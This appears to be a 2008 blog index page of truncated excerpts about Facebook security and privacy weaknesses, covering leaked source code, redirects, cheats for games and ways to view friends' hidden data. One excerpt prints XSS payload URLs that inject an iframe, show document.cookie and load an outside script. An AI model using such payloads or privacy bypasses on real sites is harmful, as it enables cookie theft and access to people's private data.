Even if you followed the advices of this past article:
http://www.tools4facebook.com/2008/12/24/facebook-privacy-default-settings-is-not-always-the-translation-of-good-privacy/
It seems it is not enough to help you keen your privacy.
Indeed, if you make some kind of Google search, as the following for instance:
As I told you yesterday, today am I publishing the list of some of the greatest weaknesses that facebook has encountered this year.
There are classed in three categories:
- Facebook major vulnerabilities,
- Thrid party application vulnerabilities and
- “Privacy” weaknesses.
Color legend: Vulnerability impact level - HIGH - MEDIUM - LOW
{smartads}
Facebook major vulnerabilities:
- 05/2008: XSS vulnerability (source)
- 08/2008: […]
On the 15th of August, facebooksecrets.blogspot.com published the homepage (index.php) source code of facebook’s website. Three hours later, the publication, on the blog hosted on the google-owned blogger network, was removed after a DMCA (Digital Millennium Copyright Act) take down notice from Facebook.You won’t find the DMCA notice on facebooksecrets.blogspot.com because this blog has been […]
Let’s image that you go on a populous and secure website like Facebook for instance. And let’s image that you click on someone profile picture just to see it. After all, you’re on a secure website and a website like facebook will not allow redirection, isn’t it?!!! It is probably right, a website like Facebook, […]
9th of August 2008: I am sorry guys, but it seems that, for an obscure reason, Facebook has blocked this joke!!!! So it is not working anymore!!!
According to the FUCA 8.1 (Facebook Ugliest Contest Award - first semester 2008), Facebook users have voted for the ugliest Facebook profile. This is the first contest […]
This little hack will show you how to see some information concerning your friends that you should not have direct access to.
In this little hack sample, I will show you how to get access to any free gifts, and the messages associated to them, of your friends.
You just need to get the user ID of […]
This new vulnerability uses a XSS (Cross-Site Scripting) technique to obtain sensitive information from Facebook users and even allows to execute malicious script code on the user computer.
xssed.com who announced (author: Mox) that vulnerability give you good samples of how it works.
Redirection sample:
http://www.xssed.com/mirror/34274/
or
Insertion in a hidden iframe:
http://www.facebook.com/jobs/position.php?st=%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
{smartads}
According to Dimitris Pagkalos from xssed.com:
“I’m quite sure there […]
This 4′51” video shows us how to hack an application like Tetris Blockstar using a soft like CheatEngine.
{smartads}
For the one who doesn’t know, Cheat Engine is a tool designed to give you the upper hand in games, but also contains other usefull tools to help debugging games and even normal applications.
In this 52 seconds video, you will learn how to hack the facebook Moods application.
All you need is:
- a facebook account (with the moods application installed)
- the Firefox browser
- the Firebug extension
- and 52 seconds of your time to die less stupid
{smartads}
The following description is an easy way to get access to the limited profile of a user from which you should not be allowed to see any part of his (her) profile except a small picture and a name as you can see it on the following sample:
The only think to do is to […]
| M | T | W | T | F | S | S |
|---|---|---|---|---|---|---|
| « Mar | ||||||
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 | |||
